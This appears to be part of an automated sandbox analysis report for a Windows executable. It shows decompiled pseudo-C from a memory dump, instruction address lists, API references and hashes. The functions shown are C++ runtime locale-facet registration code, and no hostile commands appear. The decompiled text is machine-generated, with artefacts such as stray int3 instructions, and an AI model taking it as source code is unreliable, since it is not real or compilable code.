																																														_t779 = E0042B315(_a8, E0042B22E(0x4edd80, _t778, _t801, __eflags));
																																														__eflags = _t779;
																																														if(_t779 != 0) {
																																															L103:
																																															L00488E42( &_v20);
																																															return L0049D8D4(_t779);
																																														} else {
																																															__eflags = _t801;
																																															if(__eflags == 0) {
																																																_push(_a8);
																																																_push( &_v16);
																																																__eflags = E0048E59F(_t779, _t801, __eflags) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E0042B042(__eflags);
																																																	asm("int3");
																																																	_push(8);
																																																	L0049D90B(0x4d6966, _t779, _t801);
																																																	L00488DEA( &_v20, 0);
																																																	_t802 =  *0x4ede08;
																																																	_v4 = _v4 & 0x00000000;
																																																	_v16 = _t802;
																																																	_t780 = E0042B315(_a8, E0042B22E(0x4eddac, _t779, _t802, __eflags));
																																																	__eflags = _t780;
																																																	if(_t780 != 0) {
																																																		L110:
																																																		L00488E42( &_v20);
																																																		return L0049D8D4(_t780);
																																																	} else {
																																																		__eflags = _t802;
																																																		if(__eflags == 0) {
																																																			_push(_a8);
																																																			_push( &_v16);
																																																			__eflags = E0048E607(_t780, _t802, __eflags) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E0042B042(__eflags);
																																																				asm("int3");
																																																				_push(8);
																																																				L0049D90B(0x4d6966, _t780, _t802);
																																																				L00488DEA( &_v20, 0);
																																																				_t803 =  *0x4eddd8;
																																																				_v4 = _v4 & 0x00000000;
																																																				_v16 = _t803;
																																																				_t781 = E0042B315(_a8, E0042B22E(0x4edd84, _t780, _t803, __eflags));
																																																				__eflags = _t781;
																																																				if(_t781 != 0) {
																																																					L117:
																																																					L00488E42( &_v20);
																																																					return L0049D8D4(_t781);
																																																				} else {
																																																					__eflags = _t803;
																																																					if(__eflags == 0) {
																																																						_push(_a8);
																																																						_push( &_v16);
																																																						__eflags = E0048E682(_t781, _t803, __eflags) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E0042B042(__eflags);
																																																							asm("int3");
																																																							_push(8);
																																																							L0049D90B(0x4d6966, _t781, _t803);
																																																							L00488DEA( &_v20, 0);
																																																							_t804 =  *0x4ede24;
																																																							_v4 = _v4 & 0x00000000;
																																																							_v16 = _t804;
																																																							_t782 = E0042B315(_a8, E0042B22E(0x4eddc8, _t781, _t804, __eflags));
																																																							__eflags = _t782;
																																																							if(_t782 != 0) {
																																																								L124:
																																																								L00488E42( &_v20);
																																																								return L0049D8D4(_t782);
																																																							} else {
																																																								__eflags = _t804;
																																																								if(__eflags == 0) {
																																																									_push(_a8);
																																																									_push( &_v16);
																																																									__eflags = E0048E6FD(_t782, _t804, __eflags) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E0042B042(__eflags);
																																																										asm("int3");
																																																										_push(8);
																																																										L0049D90B(0x4d6966, _t782, _t804);
																																																										L00488DEA( &_v20, 0);
																																																										_t805 =  *0x4eddf4;
																																																										_v4 = _v4 & 0x00000000;
																																																										_v16 = _t805;
																																																										_t783 = E0042B315(_a8, E0042B22E(0x4edda0, _t782, _t805, __eflags));
																																																										__eflags = _t783;
																																																										if(_t783 != 0) {
																																																											L131:
																																																											L00488E42( &_v20);
																																																											return L0049D8D4(_t783);
																																																										} else {
																																																											__eflags = _t805;
																																																											if(__eflags == 0) {
																																																												_push(_a8);
																																																												_push( &_v16);
																																																												__eflags = E0048E769(_t783, _t805, __eflags) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E0042B042(__eflags);
																																																													asm("int3");
																																																													_push(8);
																																																													L0049D90B(0x4d6966, _t783, _t805);
																																																													L00488DEA( &_v20, 0);
																																																													_t806 =  *0x4ede28;
																																																													_v4 = _v4 & 0x00000000;
																																																													_v16 = _t806;
																																																													_t784 = E0042B315(_a8, E0042B22E(0x4eddcc, _t783, _t806, __eflags));
																																																													__eflags = _t784;
																																																													if(_t784 != 0) {
																																																														L138:
																																																														L00488E42( &_v20);
																																																														return L0049D8D4(_t784);
																																																													} else {
																																																														__eflags = _t806;
																																																														if(__eflags == 0) {
																																																															_push(_a8);
																																																															_push( &_v16);
																																																															__eflags = E0048E7D5(_t784, _t806, __eflags) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																E0042B042(__eflags);
																																																																asm("int3");
																																																																_push(8);
																																																																L0049D90B(0x4d6966, _t784, _t806);
																																																																L00488DEA( &_v20, 0);
																																																																_t807 =  *0x4eddf8;
																																																																_v4 = _v4 & 0x00000000;
																																																																_v16 = _t807;
																																																																_t785 = E0042B315(_a8, E0042B22E(0x4edd78, _t784, _t807, __eflags));
																																																																__eflags = _t785;
																																																																if(_t785 != 0) {
																																																																	L145:
																																																																	L00488E42( &_v20);
																																																																	return L0049D8D4(_t785);
																																																																} else {
																																																																	__eflags = _t807;
																																																																	if(__eflags == 0) {
																																																																		_push(_a8);
																																																																		_push( &_v16);
																																																																		_t486 = E0048E849(_t785, _t807, __eflags);
																																																																		_pop(_t700);
																																																																		__eflags = _t486 - 0xffffffff;
																																																																		if(__eflags == 0) {
																																																																			E0042B042(__eflags);
																																																																			asm("int3");
																																																																			_push(_t807);
																																																																			_t808 = _t700;
																																																																			_t254 = _t808 + 0x10;
																																																																			 *_t254 =  *(_t808 + 0x10) & 0x00000000;
																																																																			__eflags =  *_t254;
																																																																			 *((intOrPtr*)(_t808 + 0x14)) = 7;
																																																																			 *_t808 = 0;
																																																																			L00494BE0( *((intOrPtr*)(_t834 + 8)));
																																																																			return _t808;
																																																																		} else {
																																																																			_t785 = _v16;
																																																																			_v16 = _t785;
																																																																			_v4 = 1;
																																																																			E0048919D(_t785);
																																																																			 *0x4f02b4();
																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t785 + 4))))();
																																																																			 *0x4eddf8 = _t785;
																																																																			goto L145;
																																																																		}
																																																																	} else {
																																																																		_t785 = _t807;
																																																																		goto L145;
																																																																	}
																																																																}
																																																															} else {
																																																																_t784 = _v16;
																																																																_v16 = _t784;
																																																																_v4 = 1;
																																																																E0048919D(_t784);
																																																																 *0x4f02b4();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t784 + 4))))();
																																																																 *0x4ede28 = _t784;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t784 = _t806;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t783 = _v16;
																																																													_v16 = _t783;
																																																													_v4 = 1;
																																																													E0048919D(_t783);
																																																													 *0x4f02b4();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t783 + 4))))();
																																																													 *0x4eddf4 = _t783;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t783 = _t805;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t782 = _v16;
																																																										_v16 = _t782;
																																																										_v4 = 1;
																																																										E0048919D(_t782);
																																																										 *0x4f02b4();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t782 + 4))))();
																																																										 *0x4ede24 = _t782;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t782 = _t804;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t781 = _v16;
																																																							_v16 = _t781;
																																																							_v4 = 1;
																																																							E0048919D(_t781);
																																																							 *0x4f02b4();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t781 + 4))))();
																																																							 *0x4eddd8 = _t781;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t781 = _t803;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t780 = _v16;
																																																				_v16 = _t780;
																																																				_v4 = 1;
																																																				E0048919D(_t780);
																																																				 *0x4f02b4();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t780 + 4))))();
																																																				 *0x4ede08 = _t780;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t780 = _t802;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t779 = _v16;
																																																	_v16 = _t779;
																																																	_v4 = 1;
																																																	E0048919D(_t779);
																																																	 *0x4f02b4();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t779 + 4))))();
																																																	 *0x4eddd4 = _t779;
																																																	goto L103;
																																																}
																																															} else {
																																																_t779 = _t801;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t778 = _v16;
																																														_v16 = _t778;
																																														_v4 = 1;
																																														E0048919D(_t778);
																																														 *0x4f02b4();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t778 + 4))))();
																																														 *0x4ede04 = _t778;
																																														goto L96;
																																													}
																																												} else {
																																													_t778 = _t800;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t777 = _v16;
																																											_v16 = _t777;
																																											_v4 = 1;
																																											E0048919D(_t777);
																																											 *0x4f02b4();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t777 + 4))))();
																																											 *0x4eddd0 = _t777;
																																											goto L89;
																																										}
																																									} else {
																																										_t777 = _t799;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t776 = _v16;
																																								_v16 = _t776;
																																								_v4 = 1;
																																								E0048919D(_t776);
																																								 *0x4f02b4();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t776 + 4))))();
																																								 *0x4ede00 = _t776;
																																								goto L82;
																																							}
																																						} else {
																																							_t776 = _t798;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t775 = _v16;
																																					_v16 = _t775;
																																					_v4 = 1;
																																					E0048919D(_t775);
																																					 *0x4f02b4();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t775 + 4))))();
																																					 *0x4eddec = _t775;
																																					goto L75;
																																				}
																																			} else {
																																				_t775 = _t797;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t774 = _v16;
																																		_v16 = _t774;
																																		_v4 = 1;
																																		E0048919D(_t774);
																																		 *0x4f02b4();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t774 + 4))))();
																																		 *0x4eddf0 = _t774;
																																		goto L68;
																																	}
																																} else {
																																	_t774 = _t796;
																																	goto L68;
																																}
																															}
																														} else {
																															_t773 = _v16;
																															_v16 = _t773;
																															_v4 = 1;
																															E0048919D(_t773);
																															 *0x4f02b4();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t773 + 4))))();
																															 *0x4ede1c = _t773;
																															goto L61;
																														}
																													} else {
																														_t773 = _t795;
																														goto L61;
																													}
																												}
																											} else {
																												_t772 = _v16;
																												_v16 = _t772;
																												_v4 = 1;
																												E0048919D(_t772);
																												 *0x4f02b4();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t772 + 4))))();
																												 *0x4ede20 = _t772;
																												goto L54;
																											}
																										} else {
																											_t772 = _t794;
																											goto L54;
																										}
																									}
																								} else {
																									_t771 = _v16;
																									_v16 = _t771;
																									_v4 = 1;
																									E0048919D(_t771);
																									 *0x4f02b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t771 + 4))))();
																									 *0x4edde8 = _t771;
																									goto L47;
																								}
																							} else {
																								_t771 = _t793;
																								goto L47;
																							}
																						}
																					} else {
																						_t770 = _v16;
																						_v16 = _t770;
																						_v4 = 1;
																						E0048919D(_t770);
																						 *0x4f02b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t770 + 4))))();
																						 *0x4ede18 = _t770;
																						goto L40;
																					}
																				} else {
																					_t770 = _t792;
																					goto L40;
																				}
																			}
																		} else {
																			_t769 = _v16;
																			_v16 = _t769;
																			_v4 = 1;
																			E0048919D(_t769);
																			 *0x4f02b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t769 + 4))))();
																			 *0x4edde4 = _t769;
																			goto L33;
																		}
																	} else {
																		_t769 = _t791;
																		goto L33;
																	}
																}
															} else {
																_t768 = _v16;
																_v16 = _t768;
																_v4 = 1;
																E0048919D(_t768);
																 *0x4f02b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t768 + 4))))();
																 *0x4ede14 = _t768;
																goto L26;
															}
														} else {
															_t768 = _t790;
															goto L26;
														}
													}
												} else {
													_t767 = _v16;
													_v16 = _t767;
													_v4 = 1;
													E0048919D(_t767);
													 *0x4f02b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t767 + 4))))();
													 *0x4edde0 = _t767;
													goto L19;
												}
											} else {
												_t767 = _t789;
												goto L19;
											}
										}
									} else {
										_t766 = _v16;
										_v16 = _t766;
										_v4 = 1;
										E0048919D(_t766);
										 *0x4f02b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t766 + 4))))();
										 *0x4ede10 = _t766;
										goto L12;
									}
								} else {
									_t766 = _t788;
									goto L12;
								}
							}
						} else {
							_t765 = _v16;
							_v16 = _t765;
							_v4 = 1;
							E0048919D(_t765);
							 *0x4f02b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t765 + 4))))();
							 *0x4eddfc = _t765;
							goto L5;
						}
					} else {
						_t765 = _t787;
						goto L5;
					}
				}
			}

0x0048c427
0x0048c42e
0x0048c438
0x0048c43d
0x0048c448
0x0048c44c
0x0048c458
0x0048c45d
0x0048c461
0x0048c4a6
0x0048c4a9
0x0048c4b5
0x0048c463
0x0048c465
0x0048c46b
0x0048c471
0x0048c479
0x0048c47c
0x0048c4b6
0x0048c4bb
0x0048c4bc
0x0048c4c3
0x0048c4cd
0x0048c4d2
0x0048c4dd
0x0048c4e1
0x0048c4f2
0x0048c4f4
0x0048c4f6
0x0048c53b
0x0048c53e
0x0048c54a
0x0048c4f8
0x0048c4f8
0x0048c4fa
0x0048c500
0x0048c506
0x0048c50e
0x0048c511
0x0048c54b
0x0048c550
0x0048c551
0x0048c558
0x0048c562
0x0048c567
0x0048c572
0x0048c576
0x0048c587
0x0048c589
0x0048c58b
0x0048c5d0
0x0048c5d3
0x0048c5df
0x0048c58d
0x0048c58d
0x0048c58f
0x0048c595
0x0048c59b
0x0048c5a3
0x0048c5a6
0x0048c5e0
0x0048c5e5
0x0048c5e6
0x0048c5ed
0x0048c5f7
0x0048c5fc
0x0048c607
0x0048c60b
0x0048c61c
0x0048c61e
0x0048c620
0x0048c665
0x0048c668
0x0048c674
0x0048c622
0x0048c622
0x0048c624
0x0048c62a
0x0048c630
0x0048c638
0x0048c63b
0x0048c675
0x0048c67a
0x0048c67b
0x0048c682
0x0048c68c
0x0048c691
0x0048c69c
0x0048c6a0
0x0048c6b1
0x0048c6b3
0x0048c6b5
0x0048c6fa
0x0048c6fd
0x0048c709
0x0048c6b7
0x0048c6b7
0x0048c6b9
0x0048c6bf
0x0048c6c5
0x0048c6cd
0x0048c6d0
0x0048c70a
0x0048c70f
0x0048c710
0x0048c717
0x0048c721
0x0048c726
0x0048c731
0x0048c735
0x0048c746
0x0048c748
0x0048c74a
0x0048c78f
0x0048c792
0x0048c79e
0x0048c74c
0x0048c74c
0x0048c74e
0x0048c754
0x0048c75a
0x0048c762
0x0048c765
0x0048c79f
0x0048c7a4
0x0048c7a5
0x0048c7ac
0x0048c7b6
0x0048c7bb
0x0048c7c6
0x0048c7ca
0x0048c7db
0x0048c7dd
0x0048c7df
0x0048c824
0x0048c827
0x0048c833
0x0048c7e1
0x0048c7e1
0x0048c7e3
0x0048c7e9
0x0048c7ef
0x0048c7f7
0x0048c7fa
0x0048c834
0x0048c839
0x0048c83a
0x0048c841
0x0048c84b
0x0048c850
0x0048c85b
0x0048c85f
0x0048c870
0x0048c872
0x0048c874
0x0048c8b9
0x0048c8bc
0x0048c8c8
0x0048c876
0x0048c876
0x0048c878
0x0048c87e
0x0048c884
0x0048c88c
0x0048c88f
0x0048c8c9
0x0048c8ce
0x0048c8cf
0x0048c8d6
0x0048c8e0
0x0048c8e5
0x0048c8f0
0x0048c8f4
0x0048c905
0x0048c907
0x0048c909
0x0048c94e
0x0048c951
0x0048c95d
0x0048c90b
0x0048c90b
0x0048c90d
0x0048c913
0x0048c919
0x0048c921
0x0048c924
0x0048c95e
0x0048c963
0x0048c964
0x0048c96b
0x0048c975
0x0048c97a
0x0048c985
0x0048c989
0x0048c99a
0x0048c99c
0x0048c99e
0x0048c9e3
0x0048c9e6
0x0048c9f2
0x0048c9a0
0x0048c9a0
0x0048c9a2
0x0048c9a8
0x0048c9ae
0x0048c9b6
0x0048c9b9
0x0048c9f3
0x0048c9f8
0x0048c9f9
0x0048ca00
0x0048ca0a
0x0048ca0f
0x0048ca1a
0x0048ca1e
0x0048ca2f
0x0048ca31
0x0048ca33
0x0048ca78
0x0048ca7b
0x0048ca87
0x0048ca35
0x0048ca35
0x0048ca37
0x0048ca3d
0x0048ca43
0x0048ca4b
0x0048ca4e
0x0048ca88
0x0048ca8d
0x0048ca8e
0x0048ca95
0x0048ca9f
0x0048caa4
0x0048caaf
0x0048cab3
0x0048cac4
0x0048cac6
0x0048cac8
0x0048cb0d
0x0048cb10
0x0048cb1c
0x0048caca
0x0048caca
0x0048cacc
0x0048cad2
0x0048cad8
0x0048cae0
0x0048cae3
0x0048cb1d
0x0048cb22
0x0048cb23
0x0048cb2a
0x0048cb34
0x0048cb39
0x0048cb44
0x0048cb48
0x0048cb59
0x0048cb5b
0x0048cb5d
0x0048cba2
0x0048cba5
0x0048cbb1
0x0048cb5f
0x0048cb5f
0x0048cb61
0x0048cb67
0x0048cb6d
0x0048cb75
0x0048cb78
0x0048cbb2
0x0048cbb7
0x0048cbb8
0x0048cbbf
0x0048cbc9
0x0048cbce
0x0048cbd9
0x0048cbdd
0x0048cbee
0x0048cbf0
0x0048cbf2
0x0048cc37
0x0048cc3a
0x0048cc46
0x0048cbf4
0x0048cbf4
0x0048cbf6
0x0048cbfc
0x0048cc02
0x0048cc0a
0x0048cc0d
0x0048cc47
0x0048cc4c
0x0048cc4d
0x0048cc54
0x0048cc5e
0x0048cc63
0x0048cc6e
0x0048cc72
0x0048cc83
0x0048cc85
0x0048cc87
0x0048cccc
0x0048cccf
0x0048ccdb
0x0048cc89
0x0048cc89
0x0048cc8b
0x0048cc91
0x0048cc97
0x0048cc9f
0x0048cca2
0x0048ccdc
0x0048cce1
0x0048cce2
0x0048cce9
0x0048ccf3
0x0048ccf8
0x0048cd03
0x0048cd07
0x0048cd18
0x0048cd1a
0x0048cd1c
0x0048cd61
0x0048cd64
0x0048cd70
0x0048cd1e
0x0048cd1e
0x0048cd20
0x0048cd26
0x0048cd2c
0x0048cd34
0x0048cd37
0x0048cd71
0x0048cd76
0x0048cd77
0x0048cd7e
0x0048cd88
0x0048cd8d
0x0048cd98
0x0048cd9c
0x0048cdad
0x0048cdaf
0x0048cdb1
0x0048cdf6
0x0048cdf9
0x0048ce05
0x0048cdb3
0x0048cdb3
0x0048cdb5
0x0048cdbb
0x0048cdc1
0x0048cdc9
0x0048cdcc
0x0048ce06
0x0048ce0b
0x0048ce0c
0x0048ce13
0x0048ce1d
0x0048ce22
0x0048ce2d
0x0048ce31
0x0048ce42
0x0048ce44
0x0048ce46
0x0048ce8b
0x0048ce8e
0x0048ce9a
0x0048ce48
0x0048ce48
0x0048ce4a
0x0048ce50
0x0048ce56
0x0048ce5e
0x0048ce61
0x0048ce9b
0x0048cea0
0x0048cea1
0x0048cea8
0x0048ceb2
0x0048ceb7
0x0048cec2
0x0048cec6
0x0048ced7
0x0048ced9
0x0048cedb
0x0048cf20
0x0048cf23
0x0048cf2f
0x0048cedd
0x0048cedd
0x0048cedf
0x0048cee5
0x0048ceeb
0x0048cef3
0x0048cef6
0x0048cf30
0x0048cf35
0x0048cf36
0x0048cf3d
0x0048cf47
0x0048cf4c
0x0048cf57
0x0048cf5b
0x0048cf6c
0x0048cf6e
0x0048cf70
0x0048cfb5
0x0048cfb8
0x0048cfc4
0x0048cf72
0x0048cf72
0x0048cf74
0x0048cf7a
0x0048cf80
0x0048cf88
0x0048cf8b
0x0048cfc5
0x0048cfca
0x0048cfcb
0x0048cfd2
0x0048cfdc
0x0048cfe1
0x0048cfec
0x0048cff0
0x0048d001
0x0048d003
0x0048d005
0x0048d04a
0x0048d04d
0x0048d059
0x0048d007
0x0048d007
0x0048d009
0x0048d00f
0x0048d015
0x0048d016
0x0048d01c
0x0048d01d
0x0048d020
0x0048d05a
0x0048d05f
0x0048d063
0x0048d067
0x0048d06b
0x0048d06b
0x0048d06b
0x0048d06f
0x0048d076
0x0048d079
0x0048d082
0x0048d022
0x0048d022
0x0048d025
0x0048d029
0x0048d02d
0x0048d03a
0x0048d042
0x0048d044
0x00000000
0x0048d044
0x0048d00b
0x0048d00b
0x00000000
0x0048d00b
0x0048d009
0x0048cf8d
0x0048cf8d
0x0048cf90
0x0048cf94
0x0048cf98
0x0048cfa5
0x0048cfad
0x0048cfaf
0x00000000
0x0048cfaf
0x0048cf76
0x0048cf76
0x00000000
0x0048cf76
0x0048cf74
0x0048cef8
0x0048cef8
0x0048cefb
0x0048ceff
0x0048cf03
0x0048cf10
0x0048cf18
0x0048cf1a
0x00000000
0x0048cf1a
0x0048cee1
0x0048cee1
0x00000000
0x0048cee1
0x0048cedf
0x0048ce63
0x0048ce63
0x0048ce66
0x0048ce6a
0x0048ce6e
0x0048ce7b
0x0048ce83
0x0048ce85
0x00000000
0x0048ce85
0x0048ce4c
0x0048ce4c
0x00000000
0x0048ce4c
0x0048ce4a
0x0048cdce
0x0048cdce
0x0048cdd1
0x0048cdd5
0x0048cdd9
0x0048cde6
0x0048cdee
0x0048cdf0
0x00000000
0x0048cdf0
0x0048cdb7
0x0048cdb7
0x00000000
0x0048cdb7
0x0048cdb5
0x0048cd39
0x0048cd39
0x0048cd3c
0x0048cd40
0x0048cd44
0x0048cd51
0x0048cd59
0x0048cd5b
0x00000000
0x0048cd5b
0x0048cd22
0x0048cd22
0x00000000
0x0048cd22
0x0048cd20
0x0048cca4
0x0048cca4
0x0048cca7
0x0048ccab
0x0048ccaf
0x0048ccbc
0x0048ccc4
0x0048ccc6
0x00000000
0x0048ccc6
0x0048cc8d
0x0048cc8d
0x00000000
0x0048cc8d
0x0048cc8b
0x0048cc0f
0x0048cc0f
0x0048cc12
0x0048cc16
0x0048cc1a
0x0048cc27
0x0048cc2f
0x0048cc31
0x00000000
0x0048cc31
0x0048cbf8
0x0048cbf8
0x00000000
0x0048cbf8
0x0048cbf6
0x0048cb7a
0x0048cb7a
0x0048cb7d
0x0048cb81
0x0048cb85
0x0048cb92
0x0048cb9a
0x0048cb9c
0x00000000
0x0048cb9c
0x0048cb63
0x0048cb63
0x00000000
0x0048cb63
0x0048cb61
0x0048cae5
0x0048cae5
0x0048cae8
0x0048caec
0x0048caf0
0x0048cafd
0x0048cb05
0x0048cb07
0x00000000
0x0048cb07
0x0048cace
0x0048cace
0x00000000
0x0048cace
0x0048cacc
0x0048ca50
0x0048ca50
0x0048ca53
0x0048ca57
0x0048ca5b
0x0048ca68
0x0048ca70
0x0048ca72
0x00000000
0x0048ca72
0x0048ca39
0x0048ca39
0x00000000
0x0048ca39
0x0048ca37
0x0048c9bb
0x0048c9bb
0x0048c9be
0x0048c9c2
0x0048c9c6
0x0048c9d3
0x0048c9db
0x0048c9dd
0x00000000
0x0048c9dd
0x0048c9a4
0x0048c9a4
0x00000000
0x0048c9a4
0x0048c9a2
0x0048c926
0x0048c926
0x0048c929
0x0048c92d
0x0048c931
0x0048c93e
0x0048c946
0x0048c948
0x00000000
0x0048c948
0x0048c90f
0x0048c90f
0x00000000
0x0048c90f
0x0048c90d
0x0048c891
0x0048c891
0x0048c894
0x0048c898
0x0048c89c
0x0048c8a9
0x0048c8b1
0x0048c8b3
0x00000000
0x0048c8b3
0x0048c87a
0x0048c87a
0x00000000
0x0048c87a
0x0048c878
0x0048c7fc
0x0048c7fc
0x0048c7ff
0x0048c803
0x0048c807
0x0048c814
0x0048c81c
0x0048c81e
0x00000000
0x0048c81e
0x0048c7e5
0x0048c7e5
0x00000000
0x0048c7e5
0x0048c7e3
0x0048c767
0x0048c767
0x0048c76a
0x0048c76e
0x0048c772
0x0048c77f
0x0048c787
0x0048c789
0x00000000
0x0048c789
0x0048c750
0x0048c750
0x00000000
0x0048c750
0x0048c74e
0x0048c6d2
0x0048c6d2
0x0048c6d5
0x0048c6d9
0x0048c6dd
0x0048c6ea
0x0048c6f2
0x0048c6f4
0x00000000
0x0048c6f4
0x0048c6bb
0x0048c6bb
0x00000000
0x0048c6bb
0x0048c6b9
0x0048c63d
0x0048c63d
0x0048c640
0x0048c644
0x0048c648
0x0048c655
0x0048c65d
0x0048c65f
0x00000000
0x0048c65f
0x0048c626
0x0048c626
0x00000000
0x0048c626
0x0048c624
0x0048c5a8
0x0048c5a8
0x0048c5ab
0x0048c5af
0x0048c5b3
0x0048c5c0
0x0048c5c8
0x0048c5ca
0x00000000
0x0048c5ca
0x0048c591
0x0048c591
0x00000000
0x0048c591
0x0048c58f
0x0048c513
0x0048c513
0x0048c516
0x0048c51a
0x0048c51e
0x0048c52b
0x0048c533
0x0048c535
0x00000000
0x0048c535
0x0048c4fc
0x0048c4fc
0x00000000
0x0048c4fc
0x0048c4fa
0x0048c47e
0x0048c47e
0x0048c481
0x0048c485
0x0048c489
0x0048c496
0x0048c49e
0x0048c4a0
0x00000000
0x0048c4a0
0x0048c467
0x0048c467
0x00000000
0x0048c467
0x0048c465

APIs

__EH_prolog3.LIBCMT ref: 0048C42E
std::_Lockit::_Lockit.LIBCPMT ref: 0048C438

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

ctype.LIBCPMT ref: 0048C472
std::_Facet_Register.LIBCPMT ref: 0048C489
std::_Lockit::~_Lockit.LIBCPMT ref: 0048C4A9
Concurrency::cancel_current_task.LIBCPMT ref: 0048C4B6

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registerctype
String ID:
API String ID: 297941480-0
Opcode ID: ee12be97501bd81eb225b8756869f46fc4d4bae759bb105ad5806daf5b86a69d
Instruction ID: 34c17f56222969e17ad71da87fb98addf7986ad3bd1835fb09125396931491aa
Opcode Fuzzy Hash: ee12be97501bd81eb225b8756869f46fc4d4bae759bb105ad5806daf5b86a69d
Instruction Fuzzy Hash: 46010071D002168BCB05FBA5D8A5ABE7771AF80724F14480FE411AB382CF3C9E018B9C

Uniqueness

Uniqueness Score: -1.00%

Function 0048C4BC, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0048C4BC(intOrPtr _a8) {
				signed int _v4;
				signed int _v16;
				char _v20;
				void* _v236;
				signed int _t249;
				void* _t463;
				short* _t667;
				void* _t728;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t734;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				void* _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				signed int _t753;
				signed int _t754;
				signed int _t755;
				signed int _t756;
				signed int _t757;
				signed int _t758;
				signed int _t759;
				signed int _t760;
				signed int _t761;
				signed int _t762;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				short* _t770;
				void* _t795;
				void* _t796;

				_push(8);
				L0049D90B(0x4d6966, _t728, _t749);
				L00488DEA( &_v20, 0);
				_t750 =  *0x4ede10; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t750;
				_t249 = E0042B315(_a8, E0042B22E(0x4eddb4, _t728, _t750, _t796));
				_t729 = _t249;
				if(_t249 != 0) {
					L5:
					L00488E42( &_v20);
					return L0049D8D4(_t729);
				} else {
					if(_t750 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = L0048DFE5(_t729, _t750, __eflags) - 0xffffffff;
						if(__eflags == 0) {
							E0042B042(__eflags);
							asm("int3");
							_push(8);
							L0049D90B(0x4d6966, _t729, _t750);
							L00488DEA( &_v20, 0);
							_t751 =  *0x4edde0; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t751;
							_t730 = E0042B315(_a8, E0042B22E(0x4edd8c, _t729, _t751, __eflags));
							__eflags = _t730;
							if(_t730 != 0) {
								L12:
								L00488E42( &_v20);
								return L0049D8D4(_t730);
							} else {
								__eflags = _t751;
								if(__eflags == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E0048E04D(_t730, _t751, __eflags) - 0xffffffff;
									if(__eflags == 0) {
										E0042B042(__eflags);
										asm("int3");
										_push(8);
										L0049D90B(0x4d6966, _t730, _t751);
										L00488DEA( &_v20, 0);
										_t752 =  *0x4ede14; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t752;
										_t731 = E0042B315(_a8, E0042B22E(0x4eddb8, _t730, _t752, __eflags));
										__eflags = _t731;
										if(_t731 != 0) {
											L19:
											L00488E42( &_v20);
											return L0049D8D4(_t731);
										} else {
											__eflags = _t752;
											if(__eflags == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E0048E0B5(_t731, _t752, __eflags) - 0xffffffff;
												if(__eflags == 0) {
													E0042B042(__eflags);
													asm("int3");
													_push(8);
													L0049D90B(0x4d6966, _t731, _t752);
													L00488DEA( &_v20, 0);
													_t753 =  *0x4edde4; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t753;
